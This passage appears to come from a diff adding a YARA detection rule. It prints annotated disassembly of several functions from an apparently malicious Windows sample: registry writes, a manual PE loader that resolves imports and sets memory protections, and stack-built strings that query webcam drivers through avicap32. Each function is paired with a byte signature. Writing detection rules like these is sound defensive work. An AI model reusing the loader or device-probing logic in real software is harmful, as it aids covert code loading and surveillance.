.text:0x00404c0e 2bc3 sub eax,ebx + .text:0x00404c10 7405 jz 0x00404c17 + .text:0x00404c12 48 dec eax + .text:0x00404c13 7425 jz 0x00404c3a + .text:0x00404c15 eb78 jmp 0x00404c8f + .text:0x00404c17 loc_00404c17: [1 XREFS] + .text:0x00404c17 8d45e0 lea eax,dword [ebp - 32] + .text:0x00404c1a 50 push eax + .text:0x00404c1b 8d4ddc lea ecx,dword [ebp - 36] + .text:0x00404c1e 51 push ecx + .text:0x00404c1f 53 push ebx + .text:0x00404c20 683f000f00 push 0x000f003f + .text:0x00404c25 53 push ebx + .text:0x00404c26 53 push ebx + 
.text:0x00404c27 53 push ebx + .text:0x00404c28 8b550c mov edx,dword [ebp + 12] + .text:0x00404c2b 52 push edx + .text:0x00404c2c 8b4508 mov eax,dword [ebp + 8] + .text:0x00404c2f 50 push eax + .text:0x00404c30 ff151c904000 call dword [0x0040901c] ;advapi32.RegCreateKeyExA(arg0,arg1,0,0,0,0x000f003f,0,local40,local36) + .text:0x00404c36 85c0 test eax,eax + .text:0x00404c38 7555 jnz 0x00404c8f + .text:0x00404c3a loc_00404c3a: [1 XREFS] + .text:0x00404c3a 8d4ddc lea ecx,dword [ebp - 36] + .text:0x00404c3d 51 push ecx + .text:0x00404c3e 681f000200 push 0x0002001f + .text:0x00404c43 53 push ebx + .text:0x00404c44 8b550c mov edx,dword [ebp + 12] + .text:0x00404c47 52 push edx + .text:0x00404c48 8b4508 mov eax,dword [ebp + 8] + .text:0x00404c4b 50 push eax + .text:0x00404c4c ff1504904000 call dword [0x00409004] ;advapi32.RegOpenKeyExA(arg0,arg1,0,0x0002001f,local40) + .text:0x00404c52 85c0 test eax,eax + .text:0x00404c54 7539 jnz 0x00404c8f + .text:0x00404c56 8b7d14 mov edi,dword [ebp + 20] + .text:0x00404c59 3bfb cmp edi,ebx + .text:0x00404c5b 7632 jbe 0x00404c8f + .text:0x00404c5d 83ff02 cmp edi,2 + .text:0x00404c60 772d ja 0x00404c8f + .text:0x00404c62 8b7518 mov esi,dword [ebp + 24] + .text:0x00404c65 56 push esi + .text:0x00404c66 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00404c6c e87ffaffff call 0x004046f0 ;sub_004046f0(arg4) + .text:0x00404c71 40 inc eax + .text:0x00404c72 50 push eax + .text:0x00404c73 56 push esi + .text:0x00404c74 57 push edi + .text:0x00404c75 53 push ebx + .text:0x00404c76 8b4d10 mov ecx,dword [ebp + 16] + .text:0x00404c79 51 push ecx + .text:0x00404c7a 8b55dc mov edx,dword [ebp - 36] + .text:0x00404c7d 52 push edx + .text:0x00404c7e ff1500904000 call dword [0x00409000] ;advapi32.RegSetValueExA(0xfefefefe,arg2,0,arg3,arg4,sub_004046f0(arg4)) + .text:0x00404c84 85c0 test eax,eax + .text:0x00404c86 7507 jnz 0x00404c8f + .text:0x00404c88 c745e401000000 mov dword [ebp - 28],1 + .text:0x00404c8f loc_00404c8f: [6 XREFS] + .text:0x00404c8f 
c745fcffffffff mov dword [ebp - 4],0xffffffff + .text:0x00404c96 e814000000 call 0x00404caf ;sub_00404caf() + .text:0x00404c9b 8b45e4 mov eax,dword [ebp - 28] + .text:0x00404c9e 8b4df0 mov ecx,dword [ebp - 16] + .text:0x00404ca1 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x00404ca8 5f pop edi + .text:0x00404ca9 5e pop esi + .text:0x00404caa 5b pop ebx + .text:0x00404cab 8be5 mov esp,ebp + .text:0x00404cad 5d pop ebp + .text:0x00404cae c3 ret + */ + $c44 = { 55 8B EC 6A FF 68 A8 92 40 00 68 90 7E 40 00 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 14 53 56 57 33 DB 89 5D ?? 89 5D ?? 8B 45 ?? 2B C3 74 ?? 48 74 ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 53 68 3F 00 0F 00 53 53 53 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 4D ?? 51 68 1F 00 02 00 53 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7D ?? 3B FB 76 ?? 83 FF 02 77 ?? 8B 75 ?? 56 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 50 56 57 53 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? 01 00 00 00 C7 45 ?? FF FF FF FF E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 
5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00404130@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - link function at runtime on Windows + .text:0x00404130 + .text:0x00404130 FUNC: int cdecl sub_00404130( int arg0, ) [2 XREFS] + .text:0x00404130 + .text:0x00404130 Stack Variables: (offset from initial top of stack) + .text:0x00404130 4: int arg0 + .text:0x00404130 -4: int local4 + .text:0x00404130 + .text:0x00404130 51 push ecx + .text:0x00404131 53 push ebx + .text:0x00404132 55 push ebp + .text:0x00404133 56 push esi + .text:0x00404134 57 push edi + .text:0x00404135 8b7c2418 mov edi,dword [esp + 24] + .text:0x00404139 bb01000000 mov ebx,1 + .text:0x0040413e 8b07 mov eax,dword [edi] + .text:0x00404140 8b6f04 mov ebp,dword [edi + 4] + .text:0x00404143 0580000000 add eax,128 + .text:0x00404148 8b4804 mov ecx,dword [eax + 4] + .text:0x0040414b 85c9 test ecx,ecx + .text:0x0040414d 0f86da000000 jbe 0x0040422d + .text:0x00404153 8b30 mov esi,dword [eax] + .text:0x00404155 6a14 push 20 + .text:0x00404157 03f5 add esi,ebp + .text:0x00404159 56 push esi + .text:0x0040415a 89742418 mov dword [esp + 24],esi + .text:0x0040415e ff15f0904000 call dword [0x004090f0] ;kernel32.IsBadReadPtr(0xc2c2c2c2,20) + .text:0x00404164 85c0 test eax,eax + .text:0x00404166 0f85c1000000 jnz 0x0040422d + .text:0x0040416c loc_0040416c: [1 XREFS] + .text:0x0040416c 8b460c mov eax,dword [esi + 12] + .text:0x0040416f 85c0 test eax,eax + .text:0x00404171 0f84be000000 jz 0x00404235 + .text:0x00404177 03c5 add eax,ebp + .text:0x00404179 50 push eax + .text:0x0040417a ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(0xc2c2c2c2) + .text:0x00404180 8bd8 mov ebx,eax + .text:0x00404182 85db test ebx,ebx + .text:0x00404184 0f849b000000 jz 0x00404225 + .text:0x0040418a 8b470c mov eax,dword [edi + 12] + .text:0x0040418d 8b5708 mov edx,dword [edi + 8] + .text:0x00404190 8d0c8504000000 lea ecx,dword [0x00000004 + eax * 4] + .text:0x00404197 51 push ecx + .text:0x00404198 52 push edx + 
.text:0x00404199 e8e63c0000 call 0x00407e84 ;msvcrt.realloc(0x61616161,0x85858588) + .text:0x0040419e 83c408 add esp,8 + .text:0x004041a1 894708 mov dword [edi + 8],eax + .text:0x004041a4 85c0 test eax,eax + .text:0x004041a6 747d jz 0x00404225 + .text:0x004041a8 8b4f0c mov ecx,dword [edi + 12] + .text:0x004041ab 891c88 mov dword [eax + ecx * 4],ebx + .text:0x004041ae 8b570c mov edx,dword [edi + 12] + .text:0x004041b1 42 inc edx + .text:0x004041b2 89570c mov dword [edi + 12],edx + .text:0x004041b5 8b06 mov eax,dword [esi] + .text:0x004041b7 85c0 test eax,eax + .text:0x004041b9 740a jz 0x004041c5 + .text:0x004041bb 8b7610 mov esi,dword [esi + 16] + .text:0x004041be 8d3c28 lea edi,dword [eax + ebp] + .text:0x004041c1 03f5 add esi,ebp + .text:0x004041c3 eb08 jmp 0x004041cd + .text:0x004041c5 loc_004041c5: [1 XREFS] + .text:0x004041c5 8b5610 mov edx,dword [esi + 16] + .text:0x004041c8 8d3c2a lea edi,dword [edx + ebp] + .text:0x004041cb 8bf7 mov esi,edi + .text:0x004041cd loc_004041cd: [1 XREFS] + .text:0x004041cd 8b07 mov eax,dword [edi] + .text:0x004041cf 85c0 test eax,eax + .text:0x004041d1 742d jz 0x00404200 + .text:0x004041d3 loc_004041d3: [1 XREFS] + .text:0x004041d3 a900000080 test eax,0x80000000 + .text:0x004041d8 7407 jz 0x004041e1 + .text:0x004041da 25ffff0000 and eax,0x0000ffff + .text:0x004041df eb04 jmp 0x004041e5 + .text:0x004041e1 loc_004041e1: [1 XREFS] + .text:0x004041e1 8d442802 lea eax,dword [eax + ebp + 2] + .text:0x004041e5 loc_004041e5: [1 XREFS] + .text:0x004041e5 50 push eax + .text:0x004041e6 53 push ebx + .text:0x004041e7 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(unknownlib,0xc2c2c2c4) + .text:0x004041ed 85c0 test eax,eax + .text:0x004041ef 8906 mov dword [esi],eax + .text:0x004041f1 7432 jz 0x00404225 + .text:0x004041f3 8b4704 mov eax,dword [edi + 4] + .text:0x004041f6 83c704 add edi,4 + .text:0x004041f9 83c604 add esi,4 + .text:0x004041fc 85c0 test eax,eax + .text:0x004041fe 75d3 jnz 0x004041d3 + .text:0x00404200 
loc_00404200: [1 XREFS] + .text:0x00404200 8b442410 mov eax,dword [esp + 16] + .text:0x00404204 6a14 push 20 + .text:0x00404206 83c014 add eax,20 + .text:0x00404209 50 push eax + .text:0x0040420a 89442418 mov dword [esp + 24],eax + .text:0x0040420e ff15f0904000 call dword [0x004090f0] ;kernel32.IsBadReadPtr(0xc2c2c2d6,20) + .text:0x00404214 85c0 test eax,eax + .text:0x00404216 751d jnz 0x00404235 + .text:0x00404218 8b7c2418 mov edi,dword [esp + 24] + .text:0x0040421c 8b742410 mov esi,dword [esp + 16] + .text:0x00404220 e947ffffff jmp 0x0040416c + .text:0x00404225 loc_00404225: [3 XREFS] + .text:0x00404225 5f pop edi + .text:0x00404226 5e pop esi + .text:0x00404227 5d pop ebp + .text:0x00404228 33c0 xor eax,eax + .text:0x0040422a 5b pop ebx + .text:0x0040422b 59 pop ecx + .text:0x0040422c c3 ret + .text:0x0040422d loc_0040422d: [2 XREFS] + .text:0x0040422d 5f pop edi + .text:0x0040422e 5e pop esi + .text:0x0040422f 8bc3 mov eax,ebx + .text:0x00404231 5d pop ebp + .text:0x00404232 5b pop ebx + .text:0x00404233 59 pop ecx + .text:0x00404234 c3 ret + .text:0x00404235 loc_00404235: [2 XREFS] + .text:0x00404235 5f pop edi + .text:0x00404236 5e pop esi + .text:0x00404237 5d pop ebp + .text:0x00404238 b801000000 mov eax,1 + .text:0x0040423d 5b pop ebx + .text:0x0040423e 59 pop ecx + .text:0x0040423f c3 ret + */ + $c45 = { 51 53 55 56 57 8B 7C 24 ?? BB 01 00 00 00 8B 07 8B 6F ?? 05 80 00 00 00 8B 48 ?? 85 C9 0F 86 ?? ?? ?? ?? 8B 30 6A 14 03 F5 56 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 85 C0 0F 84 ?? ?? ?? ?? 03 C5 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 8D 0C 85 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 08 89 47 ?? 85 C0 74 ?? 8B 4F ?? 89 1C 88 8B 57 ?? 42 89 57 ?? 8B 06 85 C0 74 ?? 8B 76 ?? 8D 3C 28 03 F5 EB ?? 8B 56 ?? 8D 3C 2A 8B F7 8B 07 85 C0 74 ?? A9 00 00 00 80 74 ?? 25 FF FF 00 00 EB ?? 8D 44 28 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 89 06 74 ?? 8B 47 ?? 83 C7 04 83 C6 04 85 C0 75 ?? 8B 44 24 ?? 
6A 14 83 C0 14 50 89 44 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7C 24 ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 59 C3 5F 5E 8B C3 5D 5B 59 C3 5F 5E 5D B8 01 00 00 00 5B 59 C3 } + /* +function at 0x00404e40@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - link function at runtime on Windows + - resolve function by parsing PE exports + .text:0x00404e40 + .text:0x00404e40 FUNC: int cdecl sub_00404e40( ) [2 XREFS] + .text:0x00404e40 + .text:0x00404e40 Stack Variables: (offset from initial top of stack) + .text:0x00404e40 -100: int local100 + .text:0x00404e40 -152: int local152 + .text:0x00404e40 -156: int local156 + .text:0x00404e40 -157: int local157 + .text:0x00404e40 -158: int local158 + .text:0x00404e40 -159: int local159 + .text:0x00404e40 -160: int local160 + .text:0x00404e40 -161: int local161 + .text:0x00404e40 -162: int local162 + .text:0x00404e40 -163: int local163 + .text:0x00404e40 -164: int local164 + .text:0x00404e40 -165: int local165 + .text:0x00404e40 -166: int local166 + .text:0x00404e40 -167: int local167 + .text:0x00404e40 -168: int local168 + .text:0x00404e40 -169: int local169 + .text:0x00404e40 -170: int local170 + .text:0x00404e40 -171: int local171 + .text:0x00404e40 -172: int local172 + .text:0x00404e40 -173: int local173 + .text:0x00404e40 -174: int local174 + .text:0x00404e40 -175: int local175 + .text:0x00404e40 -176: int local176 + .text:0x00404e40 -177: int local177 + .text:0x00404e40 -178: int local178 + .text:0x00404e40 -179: int local179 + .text:0x00404e40 -180: int local180 + .text:0x00404e40 -184: int local184 + .text:0x00404e40 -185: int local185 + .text:0x00404e40 -186: int local186 + .text:0x00404e40 -187: int local187 + .text:0x00404e40 -188: int local188 + .text:0x00404e40 -189: int local189 + .text:0x00404e40 -190: int local190 + .text:0x00404e40 -191: int local191 + .text:0x00404e40 -192: int local192 + .text:0x00404e40 -193: int local193 + .text:0x00404e40 -194: int local194 + .text:0x00404e40 -195: int local195 + 
.text:0x00404e40 -196: int local196 + .text:0x00404e40 + .text:0x00404e40 81ecc4000000 sub esp,196 + .text:0x00404e46 53 push ebx + .text:0x00404e47 55 push ebp + .text:0x00404e48 8b2d78904000 mov ebp,dword [0x00409078] + .text:0x00404e4e 56 push esi + .text:0x00404e4f b06c mov al,108 + .text:0x00404e51 57 push edi + .text:0x00404e52 33ff xor edi,edi + .text:0x00404e54 8844241a mov byte [esp + 26],al + .text:0x00404e58 8844241b mov byte [esp + 27],al + .text:0x00404e5c b341 mov bl,65 + .text:0x00404e5e b265 mov dl,101 + .text:0x00404e60 b172 mov cl,114 + .text:0x00404e62 b069 mov al,105 + .text:0x00404e64 57 push edi + .text:0x00404e65 885c2414 mov byte [esp + 20],bl + .text:0x00404e69 c644241556 mov byte [esp + 21],86 + .text:0x00404e6e c644241649 mov byte [esp + 22],73 + .text:0x00404e73 c644241743 mov byte [esp + 23],67 + .text:0x00404e78 885c2418 mov byte [esp + 24],bl + .text:0x00404e7c c644241950 mov byte [esp + 25],80 + .text:0x00404e81 c644241a33 mov byte [esp + 26],51 + .text:0x00404e86 c644241b32 mov byte [esp + 27],50 + .text:0x00404e8b c644241c2e mov byte [esp + 28],46 + .text:0x00404e90 c644241d64 mov byte [esp + 29],100 + .text:0x00404e95 c644242000 mov byte [esp + 32],0 + .text:0x00404e9a c644242463 mov byte [esp + 36],99 + .text:0x00404e9f c644242561 mov byte [esp + 37],97 + .text:0x00404ea4 c644242670 mov byte [esp + 38],112 + .text:0x00404ea9 c644242747 mov byte [esp + 39],71 + .text:0x00404eae 88542428 mov byte [esp + 40],dl + .text:0x00404eb2 c644242974 mov byte [esp + 41],116 + .text:0x00404eb7 c644242a44 mov byte [esp + 42],68 + .text:0x00404ebc 884c242b mov byte [esp + 43],cl + .text:0x00404ec0 8844242c mov byte [esp + 44],al + .text:0x00404ec4 c644242d76 mov byte [esp + 45],118 + .text:0x00404ec9 8854242e mov byte [esp + 46],dl + .text:0x00404ecd 884c242f mov byte [esp + 47],cl + .text:0x00404ed1 c644243044 mov byte [esp + 48],68 + .text:0x00404ed6 88542431 mov byte [esp + 49],dl + .text:0x00404eda c644243273 mov byte [esp + 50],115 + 
.text:0x00404edf c644243363 mov byte [esp + 51],99 + .text:0x00404ee4 884c2434 mov byte [esp + 52],cl + .text:0x00404ee8 88442435 mov byte [esp + 53],al + .text:0x00404eec c644243670 mov byte [esp + 54],112 + .text:0x00404ef1 c644243774 mov byte [esp + 55],116 + .text:0x00404ef6 88442438 mov byte [esp + 56],al + .text:0x00404efa c64424396f mov byte [esp + 57],111 + .text:0x00404eff c644243a6e mov byte [esp + 58],110 + .text:0x00404f04 885c243b mov byte [esp + 59],bl + .text:0x00404f08 c644243c00 mov byte [esp + 60],0 + .text:0x00404f0d ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f0f 8d442420 lea eax,dword [esp + 32] + .text:0x00404f13 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00404f17 50 push eax + .text:0x00404f18 51 push ecx + .text:0x00404f19 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local196) + .text:0x00404f1f 50 push eax + .text:0x00404f20 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(avicap32,local180) + .text:0x00404f26 8bd8 mov ebx,eax + .text:0x00404f28 33f6 xor esi,esi + .text:0x00404f2a loc_00404f2a: [1 XREFS] + .text:0x00404f2a 85ff test edi,edi + .text:0x00404f2c 751c jnz 0x00404f4a + .text:0x00404f2e 57 push edi + .text:0x00404f2f ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f31 8d54243c lea edx,dword [esp + 60] + .text:0x00404f35 6a32 push 50 + .text:0x00404f37 52 push edx + .text:0x00404f38 8d442478 lea eax,dword [esp + 120] + .text:0x00404f3c 6a64 push 100 + .text:0x00404f3e 50 push eax + .text:0x00404f3f 56 push esi + .text:0x00404f40 ffd3 call ebx ;UnknownApi() + .text:0x00404f42 46 inc esi + .text:0x00404f43 8bf8 mov edi,eax + .text:0x00404f45 83fe0a cmp esi,10 + .text:0x00404f48 7ce0 jl 0x00404f2a + .text:0x00404f4a loc_00404f4a: [1 XREFS] + .text:0x00404f4a 6a00 push 0 + .text:0x00404f4c ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f4e 8bc7 mov eax,edi + .text:0x00404f50 5f pop edi + .text:0x00404f51 5e pop esi + .text:0x00404f52 5d pop ebp + .text:0x00404f53 5b pop ebx + .text:0x00404f54 
81c4c4000000 add esp,196
+ .text:0x00404f5a c3 ret
+ */
+ $c46 = { 81 EC C4 00 00 00 53 55 8B 2D ?? ?? ?? ?? 56 B0 6C 57 33 FF 88 44 24 ?? 88 44 24 ?? B3 41 B2 65 B1 72 B0 69 57 88 5C 24 ?? C6 44 24 ?? 56 C6 44 24 ?? 49 C6 44 24 ?? 43 88 5C 24 ?? C6 44 24 ?? 50 C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 00 C6 44 24 ?? 63 C6 44 24 ?? 61 C6 44 24 ?? 70 C6 44 24 ?? 47 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 44 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 76 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 44 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 63 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 70 C6 44 24 ?? 74 88 44 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6E 88 5C 24 ?? C6 44 24 ?? 00 FF D5 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 33 F6 85 FF 75 ?? 57 FF D5 8D 54 24 ?? 6A 32 52 8D 44 24 ?? 6A 64 50 56 FF D3 46 8B F8 83 FE 0A 7C ?? 6A 00 FF D5 8B C7 5F 5E 5D 5B 81 C4 C4 00 00 00 C3 }
+ /*
+function at 0x00403f20@9324d1a8ae37a36ae560c37448c9705a with 1 features:
+ - enumerate PE sections
+ .text:0x00403f20
+ .text:0x00403f20 FUNC: int cdecl sub_00403f20( int arg0, int arg1, int arg2, ) [2 XREFS]
+ .text:0x00403f20
+ .text:0x00403f20 Stack Variables: (offset from initial top of stack)
+ .text:0x00403f20 12: int arg2
+ .text:0x00403f20 8: int arg1
+ .text:0x00403f20 4: int arg0
+ .text:0x00403f20 -4: int local4
+ .text:0x00403f20
+ .text:0x00403f20 51 push ecx
+ .text:0x00403f21 8b442410 mov eax,dword [esp + 16]
+ .text:0x00403f25 55 push ebp
+ .text:0x00403f26 33c9 xor ecx,ecx
+ .text:0x00403f28 56 push esi
+ .text:0x00403f29 8b6804 mov ebp,dword [eax + 4]
+ .text:0x00403f2c 8b00 mov eax,dword [eax]
+ .text:0x00403f2e c744240800000000 mov dword [esp + 8],0
+ .text:0x00403f36 668b4814 mov cx,word [eax + 20]
+ .text:0x00403f3a 6683780600 cmp word [eax + 6],0
+ .text:0x00403f3f 8d740118 lea esi,dword [ecx + eax + 24]
+ .text:0x00403f43 0f8698000000 jbe 0x00403fe1
+ .text:0x00403f49 53 push ebx
+ .text:0x00403f4a 57 push edi
+ .text:0x00403f4b 83c610 add esi,16
+ .text:0x00403f4e loc_00403f4e: [1 XREFS]
+ .text:0x00403f4e 833e00 cmp dword [esi],0
+ .text:0x00403f51 7538 jnz 0x00403f8b
+ .text:0x00403f53 8b54241c mov edx,dword [esp + 28]
+ .text:0x00403f57 8b5a38 mov ebx,dword [edx + 56]
+ .text:0x00403f5a 85db test ebx,ebx
+ .text:0x00403f5c 7e61 jle 0x00403fbf
+ .text:0x00403f5e 8b46fc mov eax,dword [esi - 4]
+ .text:0x00403f61 6a04 push 4
+ .text:0x00403f63 6800100000 push 0x00001000
+ .text:0x00403f68 03c5 add eax,ebp
+ .text:0x00403f6a 53 push ebx
+ .text:0x00403f6b 50 push eax
+ .text:0x00403f6c ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(0xc2c2c2c2,0x61616161,0x00001000,4)
+ .text:0x00403f72 8bcb mov ecx,ebx
+ .text:0x00403f74 8bf8 mov edi,eax
+ .text:0x00403f76 8bd1 mov edx,ecx
+ .text:0x00403f78 33c0 xor eax,eax
+ .text:0x00403f7a c1e902 shr ecx,2
+ .text:0x00403f7d 897ef8 mov dword [esi - 8],edi
+ .text:0x00403f80 f3ab rep: stosd
+ .text:0x00403f82 8bca mov ecx,edx
+ .text:0x00403f84 83e103 and ecx,3
+ .text:0x00403f87 f3aa rep: stosb
+ .text:0x00403f89 eb34 jmp 0x00403fbf
+ .text:0x00403f8b loc_00403f8b: [1 XREFS]
+ .text:0x00403f8b 8b4efc mov ecx,dword [esi - 4]
+ .text:0x00403f8e 8b06 mov eax,dword [esi]
+ .text:0x00403f90 6a04 push 4
+ .text:0x00403f92 6800100000 push 0x00001000
+ .text:0x00403f97 03cd add ecx,ebp
+ .text:0x00403f99 50 push eax
+ .text:0x00403f9a 51 push ecx
+ .text:0x00403f9b ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(0xc2c2c2c2,0x61616161,0x00001000,4)
+ .text:0x00403fa1 8b16 mov edx,dword [esi]
+ .text:0x00403fa3 8b0dd4aa4000 mov ecx,dword [0x0040aad4]
+ .text:0x00403fa9 8bf8 mov edi,eax
+ .text:0x00403fab 8b4604 mov eax,dword [esi + 4]
+ .text:0x00403fae 52 push edx
+ .text:0x00403faf 8b54241c mov edx,dword [esp + 28]
+ .text:0x00403fb3 03c2 add eax,edx
+ .text:0x00403fb5 50 push eax
+ .text:0x00403fb6 57 push edi
+ .text:0x00403fb7 e8a4050000 call 0x00404560 ;sub_00404560(kernel32.VirtualAlloc(0xc2c2c2c2,0x61616161,0x00001000,4),0xa2b87170,0x61616161)
+ .text:0x00403fbc 897ef8 mov dword [esi - 8],edi
+ .text:0x00403fbf loc_00403fbf: [2 XREFS]
+ .text:0x00403fbf 8b4c2420 mov ecx,dword [esp + 32]
+ .text:0x00403fc3 8b442410 mov eax,dword [esp + 16]
+ .text:0x00403fc7 40 inc eax
+ .text:0x00403fc8 83c628 add esi,40
+ .text:0x00403fcb 8b11 mov edx,dword [ecx]
+ .text:0x00403fcd 33c9 xor ecx,ecx
+ .text:0x00403fcf 89442410 mov dword [esp + 16],eax
+ .text:0x00403fd3 668b4a06 mov cx,word [edx + 6]
+ .text:0x00403fd7 3bc1 cmp eax,ecx
+ .text:0x00403fd9 0f8c6fffffff jl 0x00403f4e
+ .text:0x00403fdf 5f pop edi
+ .text:0x00403fe0 5b pop ebx
+ .text:0x00403fe1 loc_00403fe1: [1 XREFS]
+ .text:0x00403fe1 5e pop esi
+ .text:0x00403fe2 5d pop ebp
+ .text:0x00403fe3 59 pop ecx
+ .text:0x00403fe4 c3 ret
+ */
+ $c47 = { 51 8B 44 24 ?? 55 33 C9 56 8B 68 ?? 8B 00 C7 44 24 ?? 00 00 00 00 66 8B 48 ?? 66 83 78 ?? 00 8D 74 01 ?? 0F 86 ?? ?? ?? ?? 53 57 83 C6 10 83 3E 00 75 ?? 8B 54 24 ?? 8B 5A ?? 85 DB 7E ?? 8B 46 ?? 6A 04 68 00 10 00 00 03 C5 53 50 FF 15 ?? ?? ?? ?? 8B CB 8B F8 8B D1 33 C0 C1 E9 02 89 7E ?? F3 AB 8B CA 83 E1 03 F3 AA EB ?? 8B 4E ?? 8B 06 6A 04 68 00 10 00 00 03 CD 50 51 FF 15 ?? ?? ?? ?? 8B 16 8B 0D ?? ?? ?? ?? 8B F8 8B 46 ?? 52 8B 54 24 ?? 03 C2 50 57 E8 ?? ?? ?? ?? 89 7E ?? 8B 4C 24 ?? 8B 44 24 ?? 40 83 C6 28 8B 11 33 C9 89 44 24 ?? 66 8B 4A ?? 3B C1 0F 8C ?? ?? ?? ?? 5F 5B 5E 5D 59 C3 }
+ /*
+function at 0x00403ff0@9324d1a8ae37a36ae560c37448c9705a with 1 features:
+ - enumerate PE sections
+ .text:0x00403ff0
+ .text:0x00403ff0 FUNC: int cdecl sub_00403ff0( int arg0, ) [2 XREFS]
+ .text:0x00403ff0
+ .text:0x00403ff0 Stack Variables: (offset from initial top of stack)
+ .text:0x00403ff0 4: int arg0
+ .text:0x00403ff0 -4: int local4
+ .text:0x00403ff0
+ .text:0x00403ff0 51 push ecx
+ .text:0x00403ff1 8b442408 mov eax,dword [esp + 8]
+ .text:0x00403ff5 53 push ebx
+ .text:0x00403ff6 33c9 xor ecx,ecx
+ .text:0x00403ff8 55 push ebp
+ .text:0x00403ff9 8b18 mov ebx,dword [eax]
+ .text:0x00403ffb 33ed xor ebp,ebp
+ .text:0x00403ffd 668b4b14 mov cx,word [ebx + 20]
+ .text:0x00404001 66396b06 cmp word [ebx + 6],bp
+ .text:0x00404005 8d441918 lea eax,dword [ecx + ebx + 24]
+ .text:0x00404009 0f8695000000 jbe 0x004040a4
+ .text:0x0040400f 56 push esi
+ .text:0x00404010 57 push edi
+ .text:0x00404011 8d7824 lea edi,dword [eax + 36]
+ .text:0x00404014 loc_00404014: [1 XREFS]
+ .text:0x00404014 8b07 mov eax,dword [edi]
+ .text:0x00404016 8bc8 mov ecx,eax
+ .text:0x00404018 8bd0 mov edx,eax
+ .text:0x0040401a c1e91d shr ecx,29
+ .text:0x0040401d c1ea1e shr edx,30
+ .text:0x00404020 8bf0 mov esi,eax
+ .text:0x00404022 83e101 and ecx,1
+ .text:0x00404025 83e201 and edx,1
+ .text:0x00404028 c1ee1f shr esi,31
+ .text:0x0040402b a900000002 test eax,0x02000000
+ .text:0x00404030 7415 jz 0x00404047
+ .text:0x00404032 8b57ec mov edx,dword [edi - 20]
+ .text:0x00404035 8b47e4 mov eax,dword [edi - 28]
+ .text:0x00404038 6800400000 push 0x00004000
+ .text:0x0040403d 52 push edx
+ .text:0x0040403e 50 push eax
+ .text:0x0040403f ff1570904000 call dword [0x00409070] ;kernel32.VirtualFree(0x61616161,0x61616161,0x00004000)
+ .text:0x00404045 eb43 jmp 0x0040408a
+ .text:0x00404047 loc_00404047: [1 XREFS]
+ .text:0x00404047 8d0c4a lea ecx,dword [edx + ecx * 2]
+ .text:0x0040404a a900000004 test eax,0x04000000
+ .text:0x0040404f 8d144e lea edx,dword [esi + ecx * 2]
+ .text:0x00404052 8b149550a04000 mov edx,dword [0x0040a050 + edx * 4]
+ .text:0x00404059 7403 jz 0x0040405e
+ .text:0x0040405b 80ce02 or dh,2
+ .text:0x0040405e loc_0040405e: [1 XREFS]
+ .text:0x0040405e 8b4fec mov ecx,dword [edi - 20]
+ .text:0x00404061 85c9 test ecx,ecx
+ .text:0x00404063 7512 jnz 0x00404077
+ .text:0x00404065 a840 test al,64
+ .text:0x00404067 7405 jz 0x0040406e
+ .text:0x00404069 8b4b20 mov ecx,dword [ebx + 32]
+ .text:0x0040406c eb07 jmp 0x00404075
+ .text:0x0040406e loc_0040406e: [1 XREFS]
+ .text:0x0040406e a880 test al,128
+ .text:0x00404070 7418 jz 0x0040408a
+ .text:0x00404072 8b4b24 mov ecx,dword [ebx + 36]
+ .text:0x00404075 loc_00404075: [1 XREFS]
+ .text:0x00404075 85c9 test ecx,ecx
+ .text:0x00404077 loc_00404077: [1 XREFS]
+ .text:0x00404077 7611 jbe 0x0040408a
+ .text:0x00404079 8d442410 lea eax,dword [esp + 16]
+ .text:0x0040407d 50 push eax
+ .text:0x0040407e 52 push edx
+ .text:0x0040407f 51 push ecx
+ .text:0x00404080 8b4fe4 mov ecx,dword [edi - 28]
+ .text:0x00404083 51 push ecx
+ .text:0x00404084 ff15e4904000 call dword [0x004090e4] ;kernel32.VirtualProtect(0x61616161,0x61616161,32,local4)
+ .text:0x0040408a loc_0040408a: [3 XREFS]
